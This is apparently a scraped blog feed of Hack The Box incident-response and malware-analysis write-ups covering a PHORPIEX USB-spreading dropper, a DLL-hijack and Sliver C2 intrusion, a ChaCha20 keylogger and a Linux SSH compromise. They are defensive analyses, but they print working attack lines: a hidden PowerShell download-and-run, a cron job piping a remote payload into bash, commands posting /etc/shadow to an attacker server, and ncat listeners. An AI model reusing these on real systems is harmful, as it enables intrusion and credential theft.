L\u0026#34;Unnamed volume\u0026#34;); 18 wsprintfW(v4, L\u0026#34;%s%s\u0026#34;, VolumeNameBuffer, v5); 19 sub_4068E0(RootPathName, v4, FileSystemFlags, v7 == 4); usb infect # Infection worked by:\n- Creating hidden directory with volume name\n- Copying malware as DriveSecManager.exe with HIDDEN attribute\n- Creating LNK shortcut with folder icon\n- Moving all user files to hidden directory\n- Leaving only malicious LNK visible\n1if ( !PathFileExistsW(pszPath) ) 2 { 3 if ( !PathFileExistsW(PathName) \u0026amp;\u0026amp; CreateDirectoryW(PathName, 0) ) 4 SetFileAttributesW(PathName, 2u); // FILE_ATTRIBUTE_HIDDEN 5 if ( PathFileExistsW(PathName) \u0026amp;\u0026amp; CopyFileW(\u0026amp;Filename, pszPath, 0) ) 6 SetFileAttributesW(pszPath, 2u); 7 } 8 if ( !PathFileExistsW(FileName) ) 9 { 10 if ( a4 ) 11 sub_406680(FileName, L\u0026#34;shell32.dll\u0026#34;, 9); // network drive 12 else 13 sub_406680(FileName, L\u0026#34;shell32.dll\u0026#34;, 8); // USB drive 14 SetFileAttributesW(FileName, 1u); // FILE_ATTRIBUTE_READONLY 15 } User saw what looked like normal folder icon, but it was actually LNK file that executed malware.\nMalicious LNK # Used COM interface IShellLink to create LNK that:\n- Displayed folder icon from shell32.dll\n- Launched cmd.exe with command to open hidden folder and run malware\n- Victim saw files (hidden directory opened) while malware executed in background\n1void __cdecl sub_406680(int a1, int a2, int a3) 2{ 3 v6 = CoInitialize(0); 4 if ( v6 \u0026gt;= 0 ) 5 { 6 v6 = CoCreateInstance(\u0026amp;rclsid, 0, 1u, \u0026amp;riid, \u0026amp;ppv); // creates IShellLink object 7 if ( v6 \u0026gt;= 0 \u0026amp;\u0026amp; ppv ) 8 { 9 // command: open hidden folder + launch malware 10 wsprintfW(v3, L\u0026#34;/c start %s \u0026amp; start %s\\\\DriveSecManager.exe\u0026#34;, \u0026amp;unk_41430C, \u0026amp;unk_41430C); 11// ...[snip]... UPnP NAT Traversal # Implemented NAT traversal to expose infected machine to internet by configuring router port forwarding via UPnP.\nFound gateway via SSDP multicast. Sent M-SEARCH request to 239.255.255.250:1900 to discover InternetGatewayDevice:\n1int __cdecl mw_gateway_find_by_SSDP(_DWORD *a1) 2{ 3 v17 = WS2_32_23(2, 2, 17); 4 if ( v17 != -1 ) 5 { 6 v4[1] = WS2_32_9(1900); // port 1900 (SSDP) 7 v5 = WS2_32_11(\u0026#34;239.255.255.250\u0026#34;); // SSDP multicast address 8 WS2_32_21(v17, 0xFFFF, 32, \u0026amp;v14, 1); // SO_BROADCAST 9 lpString = \u0026#34;M-SEARCH * HTTP/1.1\\r\\n\u0026#34; 10 \u0026#34;ST:urn:schemas-upnp-org:device:InternetGatewayDevice:1\\r\\n\u0026#34; 11 \u0026#34;MX: 3\\r\\n\u0026#34; 12 \u0026#34;Man:\\\u0026#34;ssdp:discover\\\u0026#34;\\r\\n\u0026#34; 13 \u0026#34;HOST: 239.255.255.250:1900\\r\\n\u0026#34; 14 \u0026#34;\\r\\n\u0026#34;; 15// ...[snip]... Collected UPnP gateway URLs from responses, then configured port forwarding. Determined local IP via getsockname() by connecting to www.update.microsoft.com, then forwarded port 40500:\n1unsigned int mw_nat_local() 2{ 3 CoInitializeEx(0, 2u); 4 v3 = 0; 5 result = mw_gateway_find_by_SSDP(\u0026amp;v3); 6 v4 = result; 7 if ( result ) 8 { 9 for ( i = 0; i \u0026lt; v4; ++i ) 10 { 11 lpszUrl = sub_40DC90(*(v3 + 4 * i)); // get UPnP control URL 12 if ( lpszUrl ) 13 { 14 v1 = mw_local_ip(); 15 sub_40E780(lpszUrl, \u0026#34;TCP\u0026#34;, 0x9E34u, v1); // TCP port 40500 16 sub_40E780(lpszUrl, \u0026#34;UDP\u0026#34;, 0x9E34u, v1); // UDP port 40500 17// ...[snip]... ","date":"February 8, 2026","externalUrl":null,"permalink":"/investigations/htb-lupin/","section":"","summary":"Reverse engineering PHORPIEX dropper - analyzing clipboard hijacking, USB spreading, and UPnP NAT traversal techniques.","title":"HTB-Lupin","type":"investigations"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/motw-bypass/","section":"Tags","summary":"","title":"MotW Bypass","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/nat-traversal/","section":"Tags","summary":"","title":"NAT Traversal","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/phorpiex/","section":"Tags","summary":"","title":"PHORPIEX","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/upnp-exploitation/","section":"Tags","summary":"","title":"UPnP Exploitation","type":"tags"},{"content":"","date":"February 8, 2026","externalUrl":null,"permalink":"/tags/usb-spreading/","section":"Tags","summary":"","title":"USB Spreading","type":"tags"},{"content":"","date":"February 5, 2026","externalUrl":null,"permalink":"/tags/cve-2024-6473/","section":"Tags","summary":"","title":"CVE-2024-6473","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-05 TL;DR # Administrator executed a malicious shortcut that triggered a hidden PowerShell command, downloading and executing payload and gaining a shell access. The attacker enumerated installed software, identified a vulnerable Yandex Browser (CVE-2024-6473), and exploited DLL hijacking by planting a malicious library that acts as a dropper. This dropper deployed a Sliver C2 implant establishing persistence via a scheduled task and maintaining communication\nWhat we\u0026rsquo;ve got # 1. 2├── $Boot 3├── $Extend 4├── $LogFile 5├── $MFT 6├── $Secure_$SDS 7├── ProgramData 8├── Users 9└── Windows Initial analysis # malicious shortcut # by using Registry Explorer i identified that at 2025-01-26 16:17:15 Administrator executed a shortcut 2025-GiveAways.lnk\n1Program Name\tRun Last Executed 2C:\\Users\\Administrator\\Downloads\\2025-GiveAways.lnk\t1\t2025-01-26 16:17:15 shell access # By looking at the execution time, I identified that it executed a PowerShell command. That command downloaded and executed a malicious file svch0st.exe in the C:\\Temp\\ folder.\n2025-01-26 16:17:16\n1C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -NoExit -WindowStyle Hidden -Command if (!(Test-Path C:\\Temp)) { New-Item -ItemType Directory -Path C:\\Temp }; if (Test-Path C:\\Temp\\svchost.exe) { Remove-Item -Path C:\\Temp\\svchost.exe -Force }; Invoke-WebRequest -Uri \u0026#34;https://github.com/M4shl3/okiii/raw/main/svchost.exe\u0026#34; -OutFile \u0026#34;C:\\Temp\\svch0st.exe\u0026#34;; Start-Process -FilePath \u0026#34;C:\\Temp\\svch0st.exe\u0026#34;; Start-Sleep -Seconds 1800; Stop-Process -Name svch0st -Force; Remove-Item -Path C:\\Temp\\svch0st.exe -Force At 2025-01-26 16:17:54, the payload was executed and the attacker gained a shell access. this was determined in \u0026quot;C:\\Users\\s\\Desktop\\C\\Windows\\prefetch\\SVCH0ST.EXE-9311C47D.pf\u0026quot; by use PECmd.exe.\nenumeration # At 2025-01-26 16:19:29 he started checking installed packages on the system, most likely to find an application with vulnerabilities\n1C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -Command Get-Package i checked how the cmdlet Get-Package works and determined that it uses Package Providers to check a specific RegistryKeys, such as:\n1HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall 2HKLM\\Software\\WOW6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall 3HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall i checked all of them and found YandexBrowser 24.4.5.498, which is vulnerable to CVE-2024-6473.\nPersistance # CVE-2024-6473 # Yandex Browser for Desktop before 24.7.1.380 has a DLL Hijacking Vulnerability because an untrusted search path is used.\nin C:\\Windows\\System32\\Tasks i found the task *Update for Yandex Browser that execute a C:\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\browser.exe on strartup, and this binary uses the wldp.dll library.\nThis library was downloaded at 2025-01-26 16:36:12 from 18.192.12.126:8000. i found this by analysing CryptnetUrlCache from C:\\Users\\Administrator\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData. I extracted this malicious DLL and started analysing it.\n1wldp.dll\t.\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\tSHA256: a1a17ebd90610d808e761811d17da3143f3de0d4cc5ee92bd66000dca87d9270 I found that at 2025-01-26 16:36:55 from the same IP, another file yanda.tmp was downloaded\n1http://18.192.12.126:8000/yanda.tmp Dropper # wldp.dll # The file masquerading as wldp.dll functions as a dropper. creates a mutex, then checks if Yandex Browser is executed, if not executes its, runs a Sleep function (10,000ms) to delay execution, potentially bypassing sandbox analysis and executes the main C2 payload located at C:\\Users\\Administrator\\AppData\\Local\\Temp\\yanda.tmp\n1__int64 sub_1800748E0() 2{ 3//...[snip]... 4 hObject = CreateMutexW(0, 1, L\u0026#34;Global\\\\YandaExeMutex\u0026#34;); // creates a mutex 5 if ( !hObject 6 || GetLastError() == 183 7 || (StartupInfo.cb = 104, 8 memset(\u0026amp;StartupInfo.lpReserved, 0, 0x60u), 9 lpStartupInfo.cb = 104, 10 memset(\u0026amp;lpStartupInfo.lpReserved, 0, 0x60u), 11 (v12 = FindWindowW(0, L\u0026#34;Yandex Browser\u0026#34;)) != 0) ) // checks if Yandex Browser is running 12 { 13 CloseHandle(hObject); 14 } 15 else 16 { 17 CreateProcessW( 18 L\u0026#34;C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Yandex\\\\YandexBrowser\\\\Application\\\\browser.exe\u0026#34;, 19 0, 0, 0, 1, 0, 0, 0, \u0026amp;StartupInfo, \u0026amp;ProcessInformation); // run Yandex 20 Sleep(0x2710u); 21 WindowW = FindWindowW(0, L\u0026#34;yanda.tmp\u0026#34;); 22 v12 = WindowW; 23 if ( !WindowW ) 24 { 25 v13 = 1; 26 CreateProcessW( 27 L\u0026#34;C:\\\\Users\\\\Administrator\\\\AppData\\\\Local\\\\Temp\\\\yanda.tmp\u0026#34;, // run yanda.tmp (PE file) 28 0, 0, 0, 1, 0, 0, 0, \u0026amp;StartupInfo, \u0026amp;ProcessInformation); 29 Sleep(0x3E8u); 30 } 31//...[snip]... 32 TerminateProcess(CurrentProcess, 0); 33 } 34 return sub_180070742(v5, \u0026amp;unk_180155D10); 35} at 2025-01-26 16:38:33, a command was executed with this message:\n1powershell.exe echo You Got Pwnd C2 implant # Yanda.tmp # yanda.tmp is an obfuscated Go binary. analyzed in sandbox, i determined it is a client for the Sliver C2 Framework that establishes connections to 18.192.12.126:8888 Attack Timeline # 12025-01-26 16:17:15 - Administrator executed malicious shortcut 2025-GiveAways.lnk from Downloads folder 22025-01-26 16:17:16 - PowerShell command executed to download and run svch0st.exe 32025-01-26 16:17:54 - Malicious payload svch0st.exe executed, attacker gained initial shell access 42025-01-26 16:19:29 - Attacker enumerated installed packages using Get-Package cmdlet 52025-01-26 16:36:12 - Malicious wldp.dll downloaded from 18.192.12.126:8000 62025-01-26 16:36:55 - Secondary payload yanda.tmp downloaded from 18.192.12.126:8000 7Ongoing - Persistence via Yandex Browser scheduled task and DLL hijacking 8Ongoing - C2 communication established to 18.192.12.126:8888 via Sliver framework IOCs # Network\n- C2 Server: 18.192.12.126\n- C2 HTTP: 8000/tcp\n- C2 Sliver: 8888/tcp\nFiles\n- C:\\Users\\Administrator\\Downloads\\2025-GiveAways.lnk\n- C:\\Temp\\svch0st.exe\n- C:\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\wldp.dll\n- C:\\Users\\Administrator\\AppData\\Local\\Temp\\yanda.tmp\nScheduled Tasks\n- C:\\Windows\\System32\\Tasks\\Update for Yandex Browser\nVulnerable Software\n- YandexBrowser 24.4.5.498\nRecommendations # Immediate Actions\nIsolate the compromised system from the network immediately Block IP address 18.192.12.126 on all firewalls and network perimeters Terminate any running processes: svch0st.exe, yanda.tmp Remove malicious scheduled task: Update for Yandex Browser Delete malicious files: C:\\Temp\\svch0st.exe C:\\Users\\Administrator\\AppData\\Local\\Yandex\\YandexBrowser\\Application\\wldp.dll C:\\Users\\Administrator\\AppData\\Local\\Temp\\yanda.tmp C:\\Users\\Administrator\\Downloads\\2025-GiveAways.lnk Reset Administrator account password Software\nUpdate Yandex Browser Enable AppLocker ","date":"February 5, 2026","externalUrl":null,"permalink":"/investigations/htb-easymoney/","section":"","summary":"Administrator executed a malicious shortcut that triggered a hidden PowerShell command, downloading and executing payload and gaining a shell access. The attacker enumerated installed software, identified a vulnerable Yandex Browser (CVE-2024-6473), and exploited DLL hijacking by planting a malicious library that acts as a dropper. This dropper deployed a Sliver C2 implant establishing persistence via a scheduled task and maintaining communication","title":"HTB-EasyMoney","type":"investigations"},{"content":"","date":"February 3, 2026","externalUrl":null,"permalink":"/tags/chacha20/","section":"Tags","summary":"","title":"ChaCha20","type":"tags"},{"content":" Difficulty: Medium OS: Windows Date: 2026-02-03 Description:\nTL;DR # This malware is a targeted keylogger written in C++ (MinGW) that monitors specific applications (e.g., Google Chrome). It generates a unique session key from the victim\u0026rsquo;s MachineGuid, removes dashes to form a 32-byte key, and uses ChaCha20 to encrypt keystrokes. The encrypted data is exfiltrated over a raw TCP connection to a C2 server using an IRC-like protocol, posting into the #key_storrage channel. The malware ensures persistence by copying itself to the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup folder and employs anti-debugging techniques by decrypting critical strings only when no debugger is detected.\ninitial analysis # 1$ file * 2cap.pcapng: pcapng capture file - version 1.0 3SneakyKeys.exe: PE32+ executable for MS Windows 5.02 (console), x86-64 (stripped to external PDB), 11 sections imports # This malware sample imports a variety of Windows API functions that reveal its capabilities and potential behaviors:\nProcess and Thread Manipulation\nOpenProcess - potential process injection\nVirtualProtect - shellcode injection or code unpacking\nVirtualQuery - potential process injection\nNetwork (WS2_32.dll) full networking stack for C2 communication\nKeylogging strings # 1172.25.21.54 - hardcoded IP address 2My_dUp3r_sup3r_kon3_n0nc - hardcoded encryption key 3chacha20.h - ChaCha20 stream cipher implementation 4#key_storrage - IRC channel used for keystroke exfiltration reversing # I decompiled the main function and renamed subroutines based on their functionality:\n1__int64 mw_main() 2{ 3 mw_key_hook(); // sets up the keyboard hook 4 mw_registry(mw_ptr_to_uuid); // retrieves MachineGuid 5 sub_1400B1FC0(qword_14010A260, mw_ptr_to_uuid); // stores UUID globally 6 mw_jfree(mw_ptr_to_uuid); 7 8 // decrypts username using static key 9 mw_antidebug_decrypt(mw_username, 8, \u0026amp;unk_1400D4020); 10 v0 = sub_1400307D0(mw_username); 11 12 mw_copy_to_startup_folder(); // persistence 13 mw_start_irc(v5, qword_14010A260); // connects to C2 14} mw_key_hook() The hook installation confirms the keylogging behavior:\n1 hhk = SetWindowsHookExA(13, fn, 0, 0); // 13 = WH_KEYBOARD_LL The callback function fn() contains the core logic:\n- checks if the active window title contains \u0026ldquo;Google Chrome\u0026rdquo;\n- If a standard key is pressed, it\u0026rsquo;s added to a buffer\n- If ENTER is pressed, the buffer is encrypted and sent\n1LRESULT __fastcall fn(int code, WPARAM wParam, KBDLLHOOKSTRUCT *lParam) 2{ 3 if ( !code \u0026amp;\u0026amp; (wParam == 256 || wParam == 260) ) // WM_KEYDOWN 4 { 5 mw_window_title(v16); // captures the active window title for context 6 mw_antidebug_decrypt(v21, 13, \u0026amp;unk_1400D4040); // decrypts Google Chrome 7//...[snip]... 8 sub_1400CF8B0(v33, v34, \u0026#34; \u0026#34;); 9 sub_1400CF8B0(v32, v33, \u0026#34;#key_storrage\u0026#34;); // tags the message with the IRC channel 10 sub_1400CF8B0(v31, v32, \u0026#34; :\u0026#34;); 11//...[snip]... 12 mw_send(s, v30); 13 } 14 else 15 { 16 sub_1400B2390(\u0026amp;unk_14010A280, vkCode); // buffer 17 } cryptography # The malware uses ChaCha20 for two purposes with different keys:\nconfig decryption # Uses a hardcoded static key found in .data to decrypt strings like \u0026ldquo;Google Chrome\u0026rdquo; and C2 commands. 1Key: 4D795F64557033725F73757033725F6B6F6E335F6E306E63291A000000000000 2Nonce: 6F6E335F6E306E63 (on3_n0nc) keystrokes decryption # Uses a dynamic key (UUID) derived from the victim\u0026rsquo;s machine. The mw_registry() func retrieves MachineGuid from HKLM\\SOFTWARE\\Microsoft\\Cryptography and stored it in qword_14010A260 1//...[snip]... 2 v27 = 45; 3 v26 = sub_1400CDAF0(v5, v4, \u0026amp;v27); 4 mw_start_uuid = sub_1400AEE90(qword_14010A260); // qword_14010A260 - UUID 5 mw_end_uuid = sub_1400AF4B0(qword_14010A260); 6 sub_1400AD050(v20, mw_end_uuid, mw_start_uuid, \u0026amp;v28); 7 v10 = sub_1400AD020(v20); 8 mw_chacha20(v18, v10, \u0026amp;unk_1400D4010, 0); // encrypts keystroke with uuid key 9//...[snip]... persistance # mw_copy_to_startup_folder() — achieves persistence by copying the malware executable into the %APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup folder.\n1 if ( SHGetFolderPathA(0, 7, 0, 0, pszPath) ) // 7 = CSIDL_STARTUP 2 return -1; 3 mw_antidebug_crypt(v7, 8, \u0026amp;unk_1400D4028); // decrypts gg.exe 4//...[snip]... 5 if ( GetModuleFileNameA(0, Filename, 0x104u) ) 6 { 7 if ( CopyFileA(Filename, v2, 0) ) // copies self → Startup\\gg.exe communication with c2 # mw_start_irc() — connects to the C2 server over a raw TCP socket and communicates using a lightweight IRC-like protocol. The client registers itself using the victim\u0026rsquo;s MachineGuid as the nickname, then enters a loop that receives commands and sends encrypted keystroke data into the #key_storrage channel.\ndecryption # Analysing the PCAP capture we identified Alice\u0026rsquo;s IRC session. Her client registered with the following nickname and user string, which exposes her full MachineGuid:\n1NICK ALICE_9d9a51bf 2USER ALICE_9d9a51bf 0 * :Client with id:9d9a51bf-b38f-4964-99ad-31c1249d5a70 The MachineGuid is 9d9a51bf-b38f-4964-99ad-31c1249d5a70. Stripping dashes gives the 32-byte ChaCha20 key: 9d9a51bfb38f496499ad31c1249d5a70. The nonce is the hardcoded on3_n0nc. Several encrypted keystroke messages were captured in the #key_storrage channel:\n1PRIVMSG #key_storrage :0b8fda0526231ab7 2PRIVMSG #key_storrage :0e8bca69d22f1db404802cc6eb5234fbd7598f71914d74a386e6ddd55b3eb005c78c4d4a75fa6b519b196ea9d85438001d244e06b8401b 3PRIVMSG #key_storrage :0b97b31ed73211aa768c5fd4862226edca4a896d924d64bff387c5d45128a113c5 4PRIVMSG #key_storrage :1681c01dcb2307b3749d2ccce337379ed049e67d93397aa99688a9c841 The following Python script decrypts the messages using PyCryptodome:\n1from Crypto.Cipher import ChaCha20 2key = \u0026#34;9d9a51bfb38f496499ad31c1249d5a70\u0026#34;.encode(\u0026#39;utf-8\u0026#39;) 3nonce = b\u0026#34;on3_n0nc\u0026#34; 4cipher = ChaCha20.new(key=key, nonce=nonce) 5 6ciphertext = bytes.fromhex(\u0026#34;0b97b31ed73211aa768c5fd4862226edca4a896d924d64bff387c5d45128a113c5\u0026#34;) 7print(cipher.decrypt(ciphertext)) 1$ python3 dec.py 2b\u0026#39;MY WORDPRESS PASSWORD IS ALICE1SO\u0026#39; ","date":"February 3, 2026","externalUrl":null,"permalink":"/investigations/htb-sneakykeys/","section":"","summary":"","title":"HTB-SneakyKeys","type":"investigations"},{"content":" Difficulty: Easy OS: Linux Date: 2026-02-02 Description The IT Manager of Techniqua-Solutions Corp. is responsible for managing the company’s infrastructure. As part of his daily work, he frequently accesses company servers and workstations. One morning, the IT Manager discovered that several critical company files were missing, while others had been modified or replaced with unfamiliar ones. Concerned about a potential breach, he reported the issue to the security team.\nAs an incident response analyst, your task is to investigate the case. You have been provided with a forensic image of the IT Manager’s machine.\nwhat we\u0026rsquo;ve got # 1├── bodyfile 2│ └── bodyfile.txt 3├── hash_executables 4│ ├── hash_executables.md5 5│ └── hash_executables.sha1 6├── live_response 7│ ├── hardware 8│ ├── network 9│ ├── packages 10│ ├── process 11│ ├── storage 12│ └── system 13└── [root] 14 ├── etc 15 ├── home 16 ├── lib 17 ├── root 18 ├── run 19 ├── snap 20 ├── tmp 21 ├── usr 22 └── var first access # the attacker started brute forcing at 2025-02-10 19:38:18 from 192.168.161.198\nauth.log:\n1LuckyShot sshd[12985]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.161.198 user=root 2LuckyShot sshd[12984]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192.168.161.198 user=root 3LuckyShot sshd[12993]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=192... at 2025-02-10 19:39:03 the attacker successfully log in for the first time as administrator auth.log:\n1LuckyShot sshd[13105]: Accepted password for administrator from 192.168.161.198 port 46160 ssh2 2LuckyShot sshd[13105]: pam_unix(sshd:session): session opened for user administrator(uid=1000) by administrator(uid=0) The attacker performed system enumeration, identifying user accounts, groups, and running processes. After verifying sudo privileges, he cloned the LaZagne tool mimipenguin.sh script and for credential dumping. then he transfered a sensitive files (Passwords_Backup.txt, Server_Credentials.txt) to a remote machine\n1$ scp Passwords_Backup.txt Server_Credentials.txt kali@192.168.161.198:~/Desktop/ persistance # new service # at 2025-02-10 20:11:19 the attacker executed a malicious script sys_monitor.sh 3ae5dea716a4f7bfb18046bfba0553ea01021c75 /home/administrator/tmp/sys_monitor.sh\nthis script for persistance add new service: systemd-networkm.service\n1[Unit] 2Description=System Network Management 3After=network.target 4 5[Service] 6ExecStart=/bin/bash /tmp/sys_monitor.sh 7Restart=always 8User=root 9 10[Install] 11WantedBy=multi-user.target startup files # in root startup files .bashrc found ncat -lvp 7575 \u0026amp; and in .profile found ncat -lvp 9000 \u0026amp;\nanalyzing /root/.ssh/authorized_keys, I identified the attacker\u0026rsquo;s public key. The key comment kali@kali reveals the origin username and hostname.\n1ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCnoiT13BNG/mRCoizCTYQncnZkhm62c0WivVvTZ32FxGh+J8HzLcYnI3/FLPt2FfAkjXV1+LU+gLHtFossAIo4BfuZj7c1xwxbuEbGjD5sEYI9ayiIGV+NUM99zweVI2fVt18s0y99EHS1h94aqMT3J/J7hjbMhAuQC8ij295WReT3XvXkZ0U6YI/qFPoO7VnE4OPjq8Cgmfr7PXdpsLBs5FZ5qX6T9nWuU3yDSZWMLGyYMo0VlT1oY7fcUJyMRCjG9YHxFlGhX+136qLD+PlDWMaBJqVHfiTNyP8V4Yz9gitJ45veO6dPTa9sUHUe2LeNAVFmEgAvfaLyMZPBl6CEXzvtZbYH4Yld1U86tascPTXtLDdLipe2ElMisuld58gqWQYctkyuPTvkJwlZvxfVcFN0bA3uapEi2S3toQdoLJZO06UZxOJBBI2pjFIBJkJdiIpOzsvNPTs46hsmaIN97RHAWgm8fTd1yjXOiqoZlAo9Jujvh6KAuHiHANAuztSvC5IrgVWM5wiZBQRAVfrZanojjZr8ig22GEKupEuwCgNHc4V+VLj6ki0u5E6xeBEyhH9qZO3erK9xvqR5VMGqUnfa6qo9/ORaILj4CpX08/5He9JbgOIPpOOFEVm6e/AudL8PcPsE+oJwlXZFoyWoRyAd7CJBkbEaGHTjQ643Lw== kali@kali new user # at 2025-02-10 20:11:21. the attacker add new user Regev for pesistence auth.log:\n1LuckyShot sudo: root : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/sbin/useradd -m -s /bin/bash -G sudo,adm Regev 2LuckyShot useradd[16903]: new group: name=Regev, GID=1001 3LuckyShot useradd[16903]: new user: name=Regev, UID=1001, GID=1001, home=/home/Regev, shell=/bin/bash, from=/dev/pts/3 4LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to group \u0026#39;adm\u0026#39; 5LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to group \u0026#39;sudo\u0026#39; 6LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to shadow group \u0026#39;adm\u0026#39; 7LuckyShot useradd[16903]: add \u0026#39;Regev\u0026#39; to shadow group \u0026#39;sudo\u0026#39; data exfiltration # malicious cron # in /etc/cron.d/systemcheck i found malicious cron job configured to execute every minute with root privileges. The command downloads a payload from Pastebin, and executes it. auth.log:\n12025-02-10T20:11:20.744693+02:00 LuckyShot sudo: root : TTY=pts/2 ; PWD=/tmp ; USER=root ; COMMAND=/usr/bin/tee /etc/cron.d/syscheck 1/1 * * * root command -v curl \u0026gt;/dev/null 2\u0026gt;\u0026amp;1 || (apt update \u0026amp;\u0026amp; apt install -y curl) \u0026amp;\u0026amp; curl -fsSL https://pastebin.com/raw/SAuEez0S | rev | base64 -d | bash analysing that file \u0026hellip;\n1$ echo \u0026#34;=AHaw5CbhVGdz9CO5EjLxYTMugjNx4iM5EzLvoDc0RHag0CQgQWLgQ1UPBFIY1CIsJXdjBCfgQ2dzNXYw9yY0V2LgQjNlNXYipQDwhGcuwWYlR3cvgTOx4SM2EjL4YTMuITOx8yL6AHd0hGItAEIk1CIUN1TQBCWtACbyV3YgwHI39GZhh2cvMGdl9CI0YTZzFmY\u0026#34; | rev |base64 -d 2base64 /etc/shadow | curl -X POST -d @- http://192.168.161.198/steal.php 3base64 /etc/passwd | curl -X POST -d @- http://192.168.161.198/steal.php Attack Timeline # 12025-02-10 19:38:18 - Attempt SSH brute-force attack initiated from 192.168.161.198 targeting root account 22025-02-10 19:39:03 - Successful Authentication as `administrator` user via SSH 32025-02-10 19:39-20:11 - System enumeration performed 42025-02-10 ~20:00 - Passwords_Backup.txt, Server_Credentials.txt exfiltrated via SCP to 192.168.161.198 52025-02-10 20:11:19 - Persistence with systemd service `systemd-networkm.service` created to execute sys_monitor.sh 62025-02-10 20:11:20 - Persistence with cron job installed in `/etc/cron.d/syscheck` for automated payload execution 72025-02-10 20:11:21 - Persistence with new privileged user `Regev` created with sudo and adm group membership 82025-02-10 20:11:xx - Persistence with attacker\u0026#39;s SSH public key added to `/root/.ssh/authorized_keys` 92025-02-10 20:11:xx - Persistence with netcat listeners configured in `/root/.bashrc` (port 7575) and `/root/.profile` (port 9000) 10Ongoing - Automated exfiltration of /etc/shadow and /etc/passwd via malicious cron job IOCs # Network\n- attacker IP Address: 192.168.161.198\n- pastebin.com/raw/SAuEez0S\n- http://192.168.161.198/steal.php\n- backdoor listening ports: 7575/tcp, 9000/tcp (ncat)\nFiles\n- /home/administrator/tmp/sys_monitor.sh\n- /etc/systemd/system/systemd-networkm.service\n- /etc/cron.d/syscheck\n- /tmp/sys_monitor.sh\nModified System Files\n- /root/.bashrc - Contains ncat -lvp 7575 \u0026amp;\n- /root/.profile - Contains ncat -lvp 9000 \u0026amp;\n- /root/.ssh/authorized_keys - Unauthorized SSH key added\nUser - Backdoor User: Regev (UID: 1001, GID: 1001)\nRecomendations # Immediate Actions\nIsolate compromised system from network Block attacker IP 192.168.161.198 on firewall Remove backdoor user Regev Disable malicious service /etc/systemd/system/systemd-networkm.service Remove malicious cron: /etc/cron.d/syscheck Remove ncat -lvp entries from /root/.bashrc and /root/.profile Remove unauthorized SSH key from /root/.ssh/authorized_keys Kill netcat listeners: pkill -f \u0026quot;ncat -lvp\u0026quot; Credential\nReset passwords for administrator and root accounts Rotate all credentials from exfiltrated files (Passwords_Backup.txt, Server_Credentials.txt) System\nSSH - disable root login, implement key-based auth only, brute-force protection Configure auditd for monitoring /etc/passwd, /etc/shadow, systemd services, cron jobs, SSH keys ","date":"February 2, 2026","externalUrl":null,"permalink":"/investigations/htb-luckyshot/","section":"","summary":"","title":"HTB-LuckyShot","type":"investigations"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1053.003/","section":"Tags","summary":"","title":"T1053.003","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1098.004/","section":"Tags","summary":"","title":"T1098.004","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1110/","section":"Tags","summary":"","title":"T1110","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1136.001/","section":"Tags","summary":"","title":"T1136.001","type":"tags"},{"content":"","date":"February 2, 2026","externalUrl":null,"permalink":"/tags/t1543.002/","section":"Tags","summary":"","title":"T1543.002","type":"tags"},{"content":"","date":"January 31, 2026","externalUrl":null,"permalink":"/tags/cve-2024-4577/","section":"Tags","summary":"","title":"CVE-2024-4577","type":"tags"},{"content":" Difficulty: Easy OS: Windows Date: 2026-01-31 Description:\nInvestigation of an Active Directory breach in Main.local domain involving DC01 and two clients (Client02, Client03). User on Client02 received a phishing email that led to full domain compromise.\nTL;DR # Analyzed Windows Event Logs revealing a complete AD compromise chain: phishing email with macro-enabled document → credential dumping with Mimikatz → lateral movement via PsExec → DCSync attack → domain admin compromise → persistence via scheduled task, service, and registry run key.\nAttack Timeline # 12025-05-25 03:27:56 UTC - Initial compromise (Client02) 22025-05-25 03:32:02 UTC - Dropper download 32025-05-25 04:28:17 UTC - Reverse shell established 42025-05-25 03:37:00 UTC - PowerView downloaded 52025-05-25 03:42:33 UTC - Kerberoasting (sqlsvc) 62025-05-25 04:03:47 UTC - Lateral movement to Client03 72025-05-25 04:10:43 UTC - Mimikatz execution 82025-05-25 04:12:21 UTC - Credential abuse (lucas) 92025-05-25 04:26:36 UTC - DCSync attack 102025-05-25 04:34:01 UTC - Domain Admin access 112025-05-25 04:38:53 UTC - Persistence established Initial Access # T1566.001\nAt 2025-05-25 03:27:56 UTC, user MAIN\\jody opened a malicious macro-enabled document:\n1Process: C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE 2File: C:\\Users\\jody\\Downloads\\Profits.docm 3Parent: C:\\Windows\\explorer.exe (PID 2092) 4PID: 1160 5 6SHA256: 1C254F5E03462A7C232265E913162DF2AAE6B5EA5056284512BB32343C0A9507 Execution # The macro 